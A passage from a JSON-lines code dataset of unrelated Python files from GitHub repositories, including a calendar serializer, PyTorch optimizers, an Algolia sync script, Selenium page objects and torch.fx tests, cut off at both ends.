EventSerializer._get_datetime_from_string(end_data['date']).date()\n else:\n end = EventSerializer._get_datetime_from_string(end_data['dateTime'])\n\n updated = json_event.pop('updated', None)\n if updated:\n updated = EventSerializer._get_datetime_from_string(updated)\n\n created = json_event.pop('created', None)\n if created:\n created = EventSerializer._get_datetime_from_string(created)\n\n attendees_json = json_event.pop('attendees', [])\n attendees = [AttendeeSerializer.to_object(a) for a in attendees_json]\n\n reminders_json = json_event.pop('reminders', {})\n reminders = [ReminderSerializer.to_object(r) for r in reminders_json.get('overrides', [])]\n\n attachments_json = json_event.pop('attachments', [])\n attachments = [AttachmentSerializer.to_object(a) for a in attachments_json]\n\n conference_data = json_event.pop('conferenceData', None)\n if conference_data is not None:\n create_request = conference_data.get('createRequest', {})\n if create_request is None or create_request.get('status', {}).get('statusCode', None) in (None, 'success'):\n conference_solution = ConferenceSolutionSerializer.to_object(conference_data)\n else:\n conference_solution = ConferenceSolutionCreateRequestSerializer.to_object(conference_data)\n else:\n conference_solution = None\n\n creator_data = json_event.pop('creator', None)\n if creator_data is not None:\n creator = PersonSerializer.to_object(creator_data)\n else:\n creator = None\n\n organizer_data = json_event.pop('organizer', None)\n if organizer_data is not None:\n organizer = PersonSerializer.to_object(organizer_data)\n else:\n organizer = None\n\n return Event(\n json_event.pop('summary', None),\n start=start,\n end=end,\n timezone=timezone,\n event_id=json_event.pop('id', None),\n description=json_event.pop('description', None),\n location=json_event.pop('location', None),\n recurrence=json_event.pop('recurrence', None),\n color_id=json_event.pop('colorId', None),\n visibility=json_event.pop('visibility', None),\n attendees=attendees,\n attachments=attachments,\n reminders=reminders,\n conference_solution=conference_solution,\n default_reminders=reminders_json.pop('useDefault', False),\n guests_can_invite_others=json_event.pop('guestsCanInviteOthers', True),\n guests_can_modify=json_event.pop('guestsCanModify', False),\n guests_can_see_other_guests=json_event.pop('guestsCanSeeOtherGuests', True),\n transparency=json_event.pop('transparency', None),\n _creator=creator,\n _organizer=organizer,\n _created=created,\n _updated=updated,\n _recurring_event_id=json_event.pop('recurringEventId', None),\n **json_event\n )\n","repo_name":"kuzmoyev/google-calendar-simple-api","sub_path":"gcsa/serializers/event_serializer.py","file_name":"event_serializer.py","file_ext":"py","file_size_in_byte":6860,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"81"} +{"seq_id":"71189631624","text":"\"\"\"Code copied from https://github.com/HuangxingLin123/Learning-Rate-Dropout/blob/master/cifar10/sgd_lrd.py\"\"\"\nimport torch\nfrom torch.optim.optimizer import Optimizer\n\n\nclass SGD_LRD(Optimizer):\n def __init__(self, params, lr, momentum=0, dampening=0,\n weight_decay=0, dropout=0.0, nesterov=False):\n if lr < 0.0:\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\n if momentum < 0.0:\n raise ValueError(\"Invalid momentum value: {}\".format(momentum))\n if weight_decay < 0.0:\n raise ValueError(\"Invalid weight_decay value: {}\".format(weight_decay))\n\n defaults = dict(lr=lr, momentum=momentum, dampening=dampening,\n weight_decay=weight_decay, nesterov=nesterov,dropout=dropout)\n if nesterov and (momentum <= 0 or dampening != 0):\n raise ValueError(\"Nesterov momentum requires a momentum and zero dampening\")\n super(SGD_LRD, self).__init__(params, defaults)\n\n def __setstate__(self, state):\n super(SGD_LRD, self).__setstate__(state)\n for group in self.param_groups:\n group.setdefault('nesterov', False)\n\n def step(self, closure=None):\n \"\"\"Performs a single optimization step.\n\n Arguments:\n closure (callable, optional): A closure that reevaluates the model\n and returns the loss.\n \"\"\"\n loss = None\n if closure is not None:\n loss = closure()\n\n for group in self.param_groups:\n weight_decay = group['weight_decay']\n momentum = group['momentum']\n dampening = group['dampening']\n nesterov = group['nesterov']\n\n for p in group['params']:\n if p.grad is None:\n continue\n d_p = p.grad.data\n\n ## mask\n m = torch.ones_like(p.data) * group['dropout']\n mask = torch.bernoulli(m)\n\n if weight_decay != 0:\n d_p.add_(weight_decay, p.data)\n if momentum != 0:\n param_state = self.state[p]\n if 'momentum_buffer' not in param_state:\n buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()\n else:\n buf = param_state['momentum_buffer']\n buf.mul_(momentum).add_(1 - dampening, d_p)\n\n ##dropout learning rate\n lr_dropout = group['lr']*mask\n I_buf = lr_dropout * buf.clone()\n\n p.data.add_(-1, I_buf)\n\n return loss\n\n\n# Code copied from https://github.com/AtheMathmo/AggMo/blob/master/src/aggmo.py\nclass SGDAggMo(Optimizer):\n r\"\"\"Implements Aggregated Momentum Gradient Descent\n \"\"\"\n\n def __init__(self, params, lr, betas=[0.0, 0.9, 0.99], weight_decay=0):\n defaults = dict(lr=lr, betas=betas, weight_decay=weight_decay)\n super(SGDAggMo, self).__init__(params, defaults)\n\n @classmethod\n def from_exp_form(cls, params, lr, a=0.1, k=3, weight_decay=0):\n betas = [1 - a**i for i in range(k)]\n return cls(params, lr, betas, weight_decay)\n\n def __setstate__(self, state):\n super(SGDAggMo, self).__setstate__(state)\n\n def step(self, closure=None):\n \"\"\"Performs a single optimization step.\n Arguments:\n closure (callable, optional): A closure that reevaluates the model\n and returns the loss.\n \"\"\"\n loss = None\n if closure is not None:\n loss = closure()\n\n for group in self.param_groups:\n weight_decay = group['weight_decay']\n betas = group['betas']\n total_mom = float(len(betas))\n\n for p in group['params']:\n if p.grad is None:\n continue\n d_p = p.grad.data\n if weight_decay != 0:\n d_p.add_(weight_decay, p.data)\n param_state = self.state[p]\n if 'momentum_buffer' not in param_state:\n param_state['momentum_buffer'] = {}\n for beta in betas:\n param_state['momentum_buffer'][beta] = torch.zeros_like(p.data)\n for beta in betas:\n buf = param_state['momentum_buffer'][beta]\n # import pdb; pdb.set_trace()\n buf.mul_(beta).add_(d_p)\n p.data.sub_(group['lr'] / total_mom , buf)\n return loss\n\n def zero_momentum_buffers(self):\n for group in self.param_groups:\n betas = group['betas']\n for p in group['params']:\n param_state = self.state[p]\n param_state['momentum_buffer'] = {}\n for beta in betas:\n param_state['momentum_buffer'][beta] = torch.zeros_like(p.data)\n\n def update_hparam(self, name, value):\n for param_group in self.param_groups:\n param_group[name] = value\n","repo_name":"ifeherva/optimizer-benchmark","sub_path":"optimizers/sgd.py","file_name":"sgd.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"81"} +{"seq_id":"37688155806","text":"import json\nimport decimal\nfrom contracting.stdlib.bridge.time import Datetime, Timedelta\nfrom contracting.stdlib.bridge.decimal import ContractingDecimal, MAX_LOWER_PRECISION, fix_precision\nfrom contracting.config import INDEX_SEPARATOR, DELIMITER\n\nMONGO_MIN_INT = -(2 ** 63)\nMONGO_MAX_INT = 2 ** 63 - 1\n\n##\n# ENCODER CLASS\n# Add to this to encode Python types for storage.\n# Right now, this is only for datetime types. They are passed into the system as ISO strings, cast into Datetime objs\n# and stored as dicts. Is there a better way? I don't know, maybe.\n##\n\ndef safe_repr(obj, max_len=1024):\n try:\n r = obj.__repr__()\n rr = r.split(' at 0x')\n if len(rr) > 1:\n return rr[0] + '>'\n return rr[0][:max_len]\n except:\n return None\n\nclass Encoder(json.JSONEncoder):\n def default(self, o, *args):\n if isinstance(o, Datetime) or o.__class__.__name__ == Datetime.__name__:\n return {\n '__time__': [o.year, o.month, o.day, o.hour, o.minute, o.second, o.microsecond]\n }\n elif isinstance(o, Timedelta) or o.__class__.__name__ == Timedelta.__name__:\n return {\n '__delta__': [o._timedelta.days, o._timedelta.seconds]\n }\n elif isinstance(o, bytes):\n return {\n '__bytes__': o.hex()\n }\n elif isinstance(o, decimal.Decimal) or o.__class__.__name__ == decimal.Decimal.__name__:\n #return format(o, f'.{MAX_LOWER_PRECISION}f')\n return {\n '__fixed__': str(fix_precision(o))\n }\n\n elif isinstance(o, ContractingDecimal) or o.__class__.__name__ == ContractingDecimal.__name__:\n #return format(o._d, f'.{MAX_LOWER_PRECISION}f')\n return {\n '__fixed__': str(fix_precision(o._d))\n }\n #else:\n # return safe_repr(o)\n return super().default(o)\n\ndef encode_int(value: int):\n if MONGO_MIN_INT < value and value < MONGO_MAX_INT:\n return value\n\n return {\n '__big_int__': str(value)\n }\n\ndef encode_ints_in_dict(data: dict):\n d = dict()\n for k, v in data.items():\n if isinstance(v, int):\n d[k] = encode_int(v)\n elif isinstance(v, dict):\n d[k] = encode_ints_in_dict(v)\n elif isinstance(v, list):\n d[k] = []\n for i in v:\n if isinstance(i, dict):\n d[k].append(encode_ints_in_dict(i))\n elif isinstance(i, int):\n d[k].append(encode_int(i))\n else:\n d[k].append(i)\n else:\n d[k] = v\n\n return d\n\n# JSON library from Python 3 doesn't let you instantiate your custom Encoder. You have to pass it as an obj to json\ndef encode(data: str):\n \"\"\" NOTE:\n Normally encoding behavior is overriden in 'default' method inside\n a class derived from json.JSONEncoder. Unfortunately this can be done only\n for custom types.\n \n Due to MongoDB integer limitation (8 bytes), we need to preprocess 'big' integers.\n \"\"\"\n if isinstance(data, int):\n data = encode_int(data)\n elif isinstance(data, dict):\n data = encode_ints_in_dict(data)\n\n return json.dumps(data, cls=Encoder, separators=(',', ':'))\n\ndef as_object(d):\n if '__time__' in d:\n return Datetime(*d['__time__'])\n elif '__delta__' in d:\n return Timedelta(days=d['__delta__'][0], seconds=d['__delta__'][1])\n elif '__bytes__' in d:\n return bytes.fromhex(d['__bytes__'])\n elif '__fixed__' in d:\n return ContractingDecimal(d['__fixed__'])\n elif '__big_int__' in d:\n return int(d['__big_int__'])\n return dict(d)\n\n\n# Decode has a hook for JSON objects, which are just Python dictionaries. You have to specify the logic in this hook.\n# This is not uniform, but this is how Python made it.\ndef decode(data):\n if data is None:\n return None\n\n if isinstance(data, bytes):\n data = data.decode()\n\n try:\n return json.loads(data, object_hook=as_object)\n except json.decoder.JSONDecodeError as e:\n return None\n\n\ndef make_key(contract, variable, args=[]):\n contract_variable = INDEX_SEPARATOR.join((contract, variable))\n if args:\n return DELIMITER.join((contract_variable, *args))\n return contract_variable\n\n\ndef encode_kv(key, value):\n # if key is None:\n # key = ''\n #\n # if value is None:\n # value = ''\n\n k = key.encode()\n v = encode(value).encode()\n return k, v\n\n\ndef decode_kv(key, value):\n k = key.decode()\n v = decode(value)\n # if v == '':\n # v = None\n return k, v\n\n\nTYPES = {'__fixed__', '__delta__', '__bytes__', '__time__', '__big_int__'}\ndef convert(k, v):\n if k == '__fixed__':\n return ContractingDecimal(v)\n elif k == '__delta__':\n return Timedelta(days=v[0], seconds=v[1])\n elif k == '__bytes__':\n return bytes.fromhex(v)\n elif k == '__time__':\n return Datetime(*v)\n elif k == '__big_int__':\n return int(v)\n return v\n\n\ndef convert_dict(d):\n if not isinstance(d, dict):\n return d\n\n d2 = dict()\n for k, v in d.items():\n if k in TYPES:\n return convert(k, v)\n\n elif isinstance(v, dict):\n d2[k] = convert_dict(v)\n\n elif isinstance(v, list):\n d2[k] = []\n for i in v:\n d2[k].append(convert_dict(i))\n\n else:\n d2[k] = v\n\n return d2\n","repo_name":"Lamden/contracting","sub_path":"contracting/db/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"81"} +{"seq_id":"25651021819","text":"# -*- coding=utf-8 -*-\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n__all__ = [\"YamlToArgsError\", \"yaml_to_args\"]\n\n\nclass YamlToArgsError(Exception):\n pass\n\n\ndef yaml_to_args(schema, doc):\n if doc is None:\n return []\n\n if not isinstance(doc, dict):\n raise YamlToArgsError(f\"The document you provided is not an object (it is {type(doc)})\")\n\n args = []\n for i, (item, (key, value)) in enumerate(zip(schema[\"accepts\"], doc.items())):\n if item[\"_name_\"] != key:\n raise YamlToArgsError(\n f\"Element #{i + 1} should be {item['_name_']!r}, {key!r} given\"\n )\n\n if item.get(\"type\") == \"object\" and value is None:\n # This happens when user is offered to edit a document like:\n # options:\n # # Use force\n # # force: false\n # and they are satisfied with the defaults\n value = {}\n\n args.append(value)\n\n return args\n","repo_name":"truenas/midcli","sub_path":"midcli/editor/yaml/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"81"} +{"seq_id":"27445590755","text":"from pageObject.basePage import BasePage\nfrom public.publicLogs import PublicLogs\nfrom time import sleep\nlog = PublicLogs()\n\nclass FinanceReceiptCount(BasePage):\n\n type_input = 'xpath=>//input[@ng-model=\"receiptTypeName\"]'\n type_click = 'xpath=>//div[@ui-grid=\"gridOptions\"]/div[1]/div[1]/div[1]/div[2]/div[1]/div[1]/div[1]/div[1]'\n project_click = 'xpath=>//div[@name=\"projectId\"]/div[2]/div[1]/button'\n clear_click = 'xpath=>//button[contains(text(),\"清空\")]'\n project_input = 'xpath=>//input[@aria-label=\"Search\"]'\n project_select = 'xpath=>//span[contains(text(),\"(成都)香境·香碧歌\")]'\n startno_input ='xpath=>//input[@ng-model=\"searchFormObject.startNum\"]'\n endno_input = 'xpath=>//input[@ng-model=\"searchFormObject.endNum\"]'\n search_click = 'xpath=>//button[@ng-click=\"search()\"]'\n reset_click = 'xpath=>//button[@ng-click=\"reset()\"]'\n data_a_click = 'xpath=>//div[@id=\"mainTable\"]/div[1]/div[1]/div[1]/div[2]/div[1]/div[1]'\n catdetail_a_click = 'xpath=>//span[contains(text(),\"查看明细\")]'\n data_b_click = 'xpath=>//div[@role=\"rowheader\"]/div[1]/div[1]/div[1]'\n catdetail_b_click = 'xpath=>//span[contains(text(),\"查看详情\")]'\n data_get = '//div[@class=\"pull-left\"]/table/tbody/tr'\n detail_click = 'xpath=>//a[contains(text(),\"票据明细\")]'\n close_click = 'xpath=>//button[@class=\"close\"]'\n\n def finance_type_click(self):\n self.send_keys(self.type_input, '徐州分公司增值税普通发票')\n sleep(0.5)\n self.click(self.type_click)\n log.info(u'票据段统计信息--选择票据类型')\n sleep(0.5)\n\n def finance_project_click(self):\n self.click(self.project_click)\n sleep(0.5)\n self.click(self.clear_click)\n sleep(0.5)\n self.send_keys(self.project_input, '香碧歌')\n sleep(0.5)\n self.click(self.project_select)\n log.info(u'票据段统计信息--选择项目')\n sleep(0.5)\n self.click(self.clear_click)\n sleep(0.5)\n\n def finance_startno_input(self):\n self.send_keys(self.startno_input, 1)\n log.info(u'票据段统计信息--输入起始号码')\n sleep(0.5)\n\n def finance_endno_input(self):\n self.send_keys(self.endno_input, 99999999)\n log.info(u'票据段统计信息--输入结束号码')\n sleep(0.5)\n\n def finance_search_click(self):\n self.click(self.search_click)\n log.info(u'票据段统计信息--查询')\n sleep(5)\n\n def finance_reset_click(self):\n self.click(self.reset_click)\n log.info(u'票据段统计信息--重置')\n sleep(0.5)\n\n def finance_data_a_click(self):\n self.click(self.data_a_click)\n log.info(u'票据段统计信息--选择数据')\n sleep(0.5)\n\n def finance_catdetail_a_click(self):\n self.click(self.catdetail_a_click)\n log.info(u'票据段统计信息--查看明细')\n sleep(2)\n\n def finance_data_b_click(self):\n self.driver.switch_to.window(self.driver.window_handles[2])\n sleep(3)\n self.click(self.data_b_click)\n log.info(u'票据段统计信息--选择数据')\n sleep(0.5)\n\n def finance_catdetail_b_click(self):\n self.click(self.catdetail_b_click)\n log.info(u'票据段统计信息--查看详情')\n sleep(2)\n\n def finance_data_get(self):\n n = self.driver.find_elements_by_xpath(self.data_get)\n if len(n) > 0:\n log.info(u'票据段统计信息--查看数据正确')\n sleep(0.5)\n\n def finance_detail_click(self):\n self.click(self.detail_click)\n log.info(u'票据段统计信息--点击票据明细')\n sleep(0.5)\n\n def finance_close_click(self):\n self.click(self.close_click)\n log.info(u'票据段统计信息--关闭窗口')\n sleep(0.5)\n self.driver.close()\n sleep(0.5)\n self.driver.switch_to.window(self.driver.window_handles[1])\n sleep(0.5)","repo_name":"labixiaoxi/testJustbon","sub_path":"testJustbon/pageObject/financeReceiptCountPage.py","file_name":"financeReceiptCountPage.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3469279125","text":"import csv\nimport numpy as np\nfrom typing import Any, Callable, Optional, Type, TypeVar\n\nT = TypeVar('T', bound='Dataset')\n\nclass Dataset:\n \"\"\"A generic dataset handling common dataset operations\"\"\"\n\n n: int = None\n vals: np.ndarray = None # Shape: (n)\n coords: np.ndarray = None # Shape: (n,2)\n dist: np.ndarray = None # Shape: (n,n)\n\n def __init__(\n self,\n n: int,\n vals: np.ndarray,\n coords: np.ndarray,\n precalc_dist: bool = True) -> None:\n self.n = n\n self.vals = vals\n self.coords = coords\n\n # precalculate euclidean distances between points\n if precalc_dist:\n coords_row = np.repeat(self.coords[:, np.newaxis, ...], self.n, axis=1)\n coords_col = np.repeat(self.coords[np.newaxis, ...], self.n, axis=0)\n coords_diff = (coords_row - coords_col)\n self.dist = np.linalg.norm(coords_diff, ord=2, axis=-1)\n\n def dist(i, j) -> np.float:\n \"\"\"Calculates distance between two cities\"\"\"\n if self.dist:\n return self.dist[i,j]\n else:\n return np.linalg.norm(self.coords[i] - self.coords[j], ord=2)\n\n @classmethod\n def load(cls: Type[T], root: str, **kwargs: Any) -> T:\n \"\"\"Loads a dataset from the disk\"\"\"\n vals = np.load(root + '/vals.npy')\n coords = np.load(root + '/coords.npy')\n n = coords.shape[0]\n return cls(n, vals, coords, **kwargs)\n\n @classmethod\n def save(cls: type, root: str) -> None:\n \"\"\"Saves a dataset to disk\"\"\"\n np.save(root + '/vals.npy', dataset.vals)\n np.save(root + '/coords.npy', dataset.coords)\n\nclass GeneratorDataset(Dataset):\n \"\"\"Dataset with explicit generators\"\"\"\n\n def __init__(\n self,\n n: int,\n seed: int,\n val_gen: Callable,\n coord_gen: Callable,\n **kwargs: Any) -> None:\n\n # set seed for reproducibility\n np.random.seed(seed)\n\n # initialize dataset\n super().__init__(\n n,\n val_gen(n),\n coord_gen(n),\n **kwargs\n )\n\nclass G1Dataset(GeneratorDataset):\n \"\"\"Implements given G1 generative model\"\"\"\n def __init__(\n self,\n n: int = 100,\n seed: int = 1,\n **kwargs: Any) -> None:\n\n val_gen = lambda n: np.random.uniform(low=0, high=1, size=n) \n coord_gen = lambda n: np.random.uniform(low=0, high=1, size=(n,2))\n\n super().__init__(\n n,\n seed,\n val_gen,\n coord_gen,\n **kwargs\n )\n\nclass G2Dataset(GeneratorDataset):\n \"\"\"Implements given G2 generative model\"\"\"\n def __init__(\n self,\n n: int = 100,\n seed: int = 1,\n **kwargs: Any) -> None:\n\n val_gen = lambda n: np.exp(np.random.normal(loc=-0.85, scale=1.3, size=n))\n coord_gen = lambda n: np.random.uniform(low=0, high=1, size=(n,2))\n\n super().__init__(\n n,\n seed,\n val_gen,\n coord_gen,\n **kwargs\n )\n\nclass CSVDataset(Dataset):\n def __init__(\n self,\n path: str,\n ) -> None:\n with open(path, 'r') as file:\n reader = csv.reader(file)\n rows = []\n for r in reader:\n rows.append(r)\n rows = rows[1:]\n \n self.ids = np.array([ r[0] for r in rows ])\n super().__init__(\n n=len(rows),\n vals=np.array([ float(r[1]) for r in rows ]),\n coords=np.array([ [float(r[2]), float(r[3])] for r in rows ])\n )\n\n def output_csv(\n self,\n path: str,\n cities: np.ndarray\n ) -> None:\n out = [['id', 'include']]\n for i in range(len(self.ids)):\n out.append([ self.ids[i], (1 if i in cities else 0) ])\n\n with open(path, 'w+') as file:\n writer = csv.writer(file, delimiter=',')\n writer.writerows(out)\n","repo_name":"okyksl/com-516-project","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22834858035","text":"import os\nfrom algoliasearch.search_client import SearchClient\nimport json\nimport firebase_admin\nimport google.cloud\nfrom firebase_admin import credentials, firestore\nfrom pathlib import Path\nfrom dotenv import load_dotenv\nimport sys\n\nenv_path = Path('../../../') / '.env'\nload_dotenv(dotenv_path=env_path)\n\nFIREBASE_PROJECT_ID = os.getenv(\"FIREBASE_PROJECT_ID\")\ncred = credentials.Certificate('../../../jacaranda-app-firebase-adminsdk.json')\n\ndefault_app = firebase_admin.initialize_app(cred, {\n 'projectId': FIREBASE_PROJECT_ID,\n})\n\nfirestore_client = firestore.client()\ndoc_ref = firestore_client.collection('properties')\n\ndef get_all_properties_firebase():\n all_properties = doc_ref.stream()\n current_properties = []\n for doc in all_properties:\n current_properties.append(doc.to_dict())\n \n return current_properties\n\ndef save_to_algolia():\n properties_on_firebase = get_all_properties_firebase()\n\n algolia_data = []\n query = '' # Empty query will match all record\n res = index.browse_objects({'query': query})\n\n for hit in res:\n algolia_data.append(hit)\n \n actual_properties = []\n for obj in properties_on_firebase:\n if not any(item.get('uuid', None) == obj['uuid'] for item in algolia_data):\n district = obj['district']\n\n data = {\n 'title': obj['title'],\n 'price': obj['price'],\n 'uuid': obj['uuid'],\n 'district': district.replace(\" \", \"\"),\n 'images': obj['images'][0],\n 'property_details': obj['property_details'],\n 'property_info': obj['property_info'] if 'property_info' in obj else []\n }\n actual_properties.append(data)\n\n\n chunk_size = 100\n chunks = [actual_properties[i:i+chunk_size] for i in range(0, len(actual_properties), chunk_size)]\n\n for chunk in chunks:\n index.save_objects(chunk, {'autoGenerateObjectIDIfNotExist': True})\n\n\n\nif __name__ == \"__main__\":\n ALGOLIA_APP = os.getenv('ALGOLIA_APP_ID')\n ALGOLIA_ADMIN_API_KEY = os.getenv('ALGOLIA_ADMIN_API_KEY')\n client = SearchClient.create(ALGOLIA_APP, ALGOLIA_ADMIN_API_KEY)\n index = client.init_index('jacaranda')\n save_to_algolia()\n\n","repo_name":"geekycoder28/python-scrapping","sub_path":"uservices/news_scrapper/app/algolia.py","file_name":"algolia.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25705077368","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Nikolay Mamashin (mamashin@gmail.com)'\n\nfrom decouple import config\n\n\nfake_yandex_oauth = {\n \"client_id\": config('CLIENT_ID'),\n \"client_secret\": config('CLIENT_SECRET'),\n \"client_code\": config('CLIENT_CODE'),\n \"token\": config('TOKEN'),\n \"user_id\": config('USER_ID')\n}\n","repo_name":"mamashin/alice_plus_fastapi","sub_path":"fake_yandex_oauth.py","file_name":"fake_yandex_oauth.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"73208051464","text":"#coding:utf-8\n\nfrom\tdjango.db\timport\tconnections, transaction\n\n\n\n### --- Получение списка дат на сегодня ---\ndef\tGetDatesList():\n cursor = connections['default'].cursor()\n cursor.execute(\"SELECT * FROM t_show_user_dates;\")\n data = cursor.fetchall()\n \n return data\n \n","repo_name":"v-komarov/authbase","sub_path":"authbase/lib/dates.py","file_name":"dates.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"33772997996","text":"# permutation02.py [with Duplicates\ndef main():\n A = 'abbc'\n n = len(A)\n items, counts = getCount(A)\n solutions = []\n window = []\n level = 0\n solutions = findPermutations(items, counts, window, solutions, level, n)\n\n for permutation in solutions:\n print(permutation)\n\n# returns all permutations in lexicographical order\ndef findPermutations(items, counts, window, solutions, level, n):\n\n # base case\n if level == n:\n solutions.append(window[:])\n return solutions\n\n for i in range(len(counts)):\n if counts[i] == 0:\n continue\n\n counts[i] -= 1\n window.append(items[i])\n findPermutations(items, counts, window, solutions, level+1, n)\n window.pop()\n counts[i] += 1\n\n return solutions\n\ndef getCount(A):\n itemcount = dict()\n for item in A:\n if itemcount.get(item, 0) == 0:\n itemcount[item] = 1\n else:\n itemcount[item] += 1\n items = list((itemcount.keys()))\n items.sort()\n counts = [itemcount[item] for item in items]\n return items, counts\n\nif __name__ == '__main__':\n main()\n","repo_name":"Rimesh/InterviewBit","sub_path":"Backtracking/permutation02.py","file_name":"permutation02.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42618772478","text":"import torch\nimport unittest\nimport operator\nimport numbers\nfrom torch.fx import symbolic_trace, Proxy, Node, GraphModule, DefaultDelegate\n\nfrom fx.quantization import Quantizer\n\nfrom typing import Any, Callable, Dict, Optional, Tuple, Union\nfrom torch.testing._internal.common_utils import run_tests, skipIfRocm\nfrom torch.testing._internal.jit_utils import JitTestCase\n\ntry:\n from torchvision.models import resnet18\n HAS_TORCHVISION = True\nexcept ImportError:\n HAS_TORCHVISION = False\nskipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, \"no torchvision\")\n\nclass TestFX(JitTestCase):\n def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):\n \"\"\"Check that an nn.Module's results match the GraphModule version\n for a given set of args/kwargs.\n \"\"\"\n kwargs = kwargs if kwargs else {}\n ref_outs = m(*args, **kwargs)\n gm = symbolic_trace(m)\n test_outs = gm(*args, **kwargs)\n self.assertEqual(ref_outs, test_outs)\n\n def test_graph_module(self):\n class MySub(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.w = torch.nn.Parameter(torch.rand(4, 3))\n\n def forward(self, x):\n return self.w + x\n\n class MyModule(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.lin = torch.nn.Linear(4, 3)\n self.sub_mod = MySub()\n self.w = torch.nn.Parameter(torch.rand(3))\n\n def forward(self, A, B, c):\n t = torch.sigmoid(A) + self.lin(c)\n return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))\n\n m = MyModule()\n gm = symbolic_trace(m)\n\n ms = torch.jit.script(gm)\n\n class M2(torch.nn.Module):\n def forward(self, A):\n m, idx = torch.max(A, 0)\n return m + 1, idx + 1\n\n m2 = M2()\n gm2 = symbolic_trace(m2)\n\n class T(torch.nn.Module):\n\n def forward(self, A, b=4, *args, c=5, **kwargs):\n x = A + 1 + args[0] + kwargs['3']\n return x\n\n t = T()\n symbolic_trace(t)\n\n def test_args_kwargs(self):\n class T(torch.nn.Module):\n def forward(self, *args, **kwargs):\n x = args[0] + kwargs['foo']\n return x\n\n t = T()\n self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})\n\n def test_fx_shifts(self):\n class MyModule(torch.nn.Module):\n def forward(self, x):\n return x << 3, x >> 3\n\n input = torch.LongTensor(10).random_(0, 1024)\n\n m = MyModule()\n self.checkGraphModule(m, (input,))\n\n def test_dict(self):\n class MyDictMod(torch.nn.Module):\n def forward(self, d):\n return d['3'].relu(), {'4' : d['3'].neg()}\n\n input_dict = {'3': torch.rand(3, 4)}\n m = MyDictMod()\n\n self.checkGraphModule(m, (input_dict,))\n\n def test_disallow_override(self):\n # Custom delegate to disallow in-place tensor operations\n class NoMutableCallDelegate(DefaultDelegate):\n def create_node(self, kind : str, target : Union[str, Callable],\n args : Tuple[Any], kwargs : Dict[str, Any], name : Optional[str] = None) -> Node:\n name = target if isinstance(target, str) else torch.typename(target)\n if name[-1] == '_':\n raise RuntimeError('In-place operations are not supported')\n return super().create_node(kind, target, args, kwargs, name)\n\n # Test method\n class MyInplaceMod(torch.nn.Module):\n def forward(self, x):\n x.add_(3.0)\n return x\n\n m = MyInplaceMod()\n\n with self.assertRaisesRegex(RuntimeError, 'In-place operations'):\n symbolic_trace(m, delegate_class=NoMutableCallDelegate)\n\n # Test free function\n class MyInplaceMod2(torch.nn.Module):\n def forward(self, x):\n torch.log_(x)\n return x\n m2 = MyInplaceMod2()\n with self.assertRaisesRegex(RuntimeError, 'In-place operations'):\n symbolic_trace(m2, delegate_class=NoMutableCallDelegate)\n\n # Test symbolic node as an arg\n class MyInplaceMod3(torch.nn.Module):\n def forward(self, x):\n y = torch.ones(3, 4)\n y.add_(x)\n return x\n m3 = MyInplaceMod3()\n with self.assertRaisesRegex(RuntimeError, 'In-place operations'):\n symbolic_trace(m3, delegate_class=NoMutableCallDelegate)\n\n def test_leaf_module(self):\n # Custom delegate to make it so that there are no leaf modules, everything\n # should get traced through\n class NoLeafModulesDelegate(DefaultDelegate):\n def is_leaf_module(self, m):\n return False\n\n class MyReluMod(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.relu = torch.nn.ReLU()\n\n def forward(self, x):\n return self.relu(x)\n\n mrm = MyReluMod()\n sym = symbolic_trace(mrm, delegate_class=NoLeafModulesDelegate)\n for node in sym.graph.nodes:\n self.assertNotEqual(node.op, 'call_module')\n\n def test_graph_edit_with_proxy(self):\n class M(torch.nn.Module):\n def forward(self, a, b):\n return a + b\n m = M()\n g = symbolic_trace(m).graph\n t = Proxy(g.result)\n # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.\n g.output((t + t).node)\n gm = GraphModule(m, g)\n self.assertEqual(gm(3, 4), 14)\n\n @skipIfNoTorchVision\n def test_resnet(self):\n resnet = resnet18()\n resnet.train()\n\n res_graph = symbolic_trace(resnet)\n res_script = torch.jit.script(res_graph)\n\n ip = torch.rand(1, 3, 224, 224)\n\n a = resnet(ip)\n b = res_graph(ip)\n c = res_script(ip)\n assert torch.allclose(a, b)\n assert torch.allclose(a, c)\n\n quantizer = Quantizer(res_graph)\n\n for i in range(10):\n quantizer.observe((torch.rand(1, 3, 224, 224),))\n\n qgraph = quantizer.quantize()\n qgraph_script = torch.jit.script(qgraph)\n\n d = qgraph(ip)\n e = qgraph_script(ip)\n\n assert (a - d).abs().max() < 2\n assert torch.allclose(d, e)\n\n def test_unpack(self):\n class M(torch.nn.Module):\n 